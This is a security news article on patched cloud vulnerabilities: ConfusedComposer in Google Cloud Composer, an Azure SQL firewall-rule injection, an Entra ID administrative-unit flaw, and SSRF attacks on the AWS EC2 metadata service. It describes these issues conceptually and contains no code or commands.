Cybersecurity researchers have exposed a series of cloud-related vulnerabilities that could have allowed attackers to escalate privileges, manipulate configurations, and compromise sensitive data across major platforms including Google Cloud Platform (GCP), Microsoft Azure, and Amazon Web Services (AWS). These now-patched flaws illustrate the growing complexity and interconnected risk within modern cloud infrastructures.
One significant vulnerability, dubbed ConfusedComposer, was discovered in Google Cloud’s Cloud Composer service by researchers at Tenable. Cloud Composer, built on Apache Airflow, lets users orchestrate complex workflows. According to Liv Matan, senior security researcher at Tenable, attackers with only edit permissions could have escalated access to the Cloud Build service account, which carries elevated privileges across multiple GCP services such as Cloud Build, Cloud Storage, and the Artifact Registry.
Privilege Escalation via Malicious PyPI Packages
Tenable identified that Cloud Composer allows the installation of custom PyPI packages, opening the door for an attacker to inject a malicious package during an environment update. This package could contain installation scripts capable of executing arbitrary code inside Cloud Build’s context, effectively granting unauthorized access to sensitive GCP services. The vulnerability represents a variant of a previous flaw known as ConfusedFunction, and follows another recent GCP issue, ImageRunner, which targeted Cloud Run to compromise container image integrity.
“ConfusedComposer is significant because it reveals how hidden interactions between cloud services can lead to privilege escalation,” Matan explained. All it took was a user with permission to update a Cloud Composer environment to compromise high-privilege components.
If exploited, attackers could steal data, inject malicious code into CI/CD pipelines, or create persistent backdoors in cloud environments. Google patched the vulnerability on April 13, 2025, switching Cloud Composer’s behavior to use the environment’s own service account for PyPI installations, instead of the more powerful default Cloud Build account.
Google noted that Cloud Composer 2 environments created with version 2.10.2 and later, and all Cloud Composer 3 environments, already follow the updated security model. Older Composer 2 setups were migrated to use the safer configuration.
Microsoft Azure SQL and Entra ID Bugs Also Addressed
Around the same time, Varonis Threat Labs disclosed a critical flaw in Microsoft Azure involving Azure SQL Server. Known as the Destructive Stored URL Parameter Injection vulnerability, it allowed a privileged attacker to manipulate server firewall rule names via Transact-SQL (T-SQL).
By inserting specific characters, a threat actor could inject logic that triggers destructive actions — such as deleting arbitrary Azure resources — once an administrator interacts with the configuration. Researcher Coby Abrams warned that this issue could lead to large-scale data loss if successfully exploited. Microsoft resolved the flaw on April 9, 2025, after being notified on August 5, 2024.
In another case involving Microsoft Entra ID, formerly Azure Active Directory, Datadog Security Labs discovered a vulnerability within restricted administrative units. These units are intended to scope administrator control, but the flaw enabled a privileged user to lock down an account so thoroughly that even Global Administrators couldn’t delete, modify, or reset it.
Researcher Katie Knowles explained that attackers could protect accounts under their control by blocking key admin actions such as password resets, session revocation, and MFA clearance. Microsoft patched the issue on February 22, 2025, after receiving the report in August 2024.
AWS EC2 Metadata Targeted via SSRF
Meanwhile, threat actors are actively exploiting Server-Side Request Forgery (SSRF) vulnerabilities in AWS EC2 instances to access instance metadata. According to F5 Labs researcher Merlyn Albery-Speyer, attackers leverage SSRF flaws to extract sensitive data without authenticating or making external API calls.
The EC2 Instance Metadata Service (IMDS) provides runtime access to critical instance details like IP addresses, IAM role credentials, and instance IDs. Attackers who access this data can impersonate EC2 roles, pivot into other services, or escalate privileges within the AWS environment.
These revelations underscore the inherently interconnected nature of cloud services, where minor misconfigurations or design choices can lead to significant breaches if exploited. Cloud providers like Google, Microsoft, and Amazon are continually updating their security models in response, but researchers stress the importance of rigorous testing, least-privilege access, and transparent patching timelines to safeguard critical infrastructure.
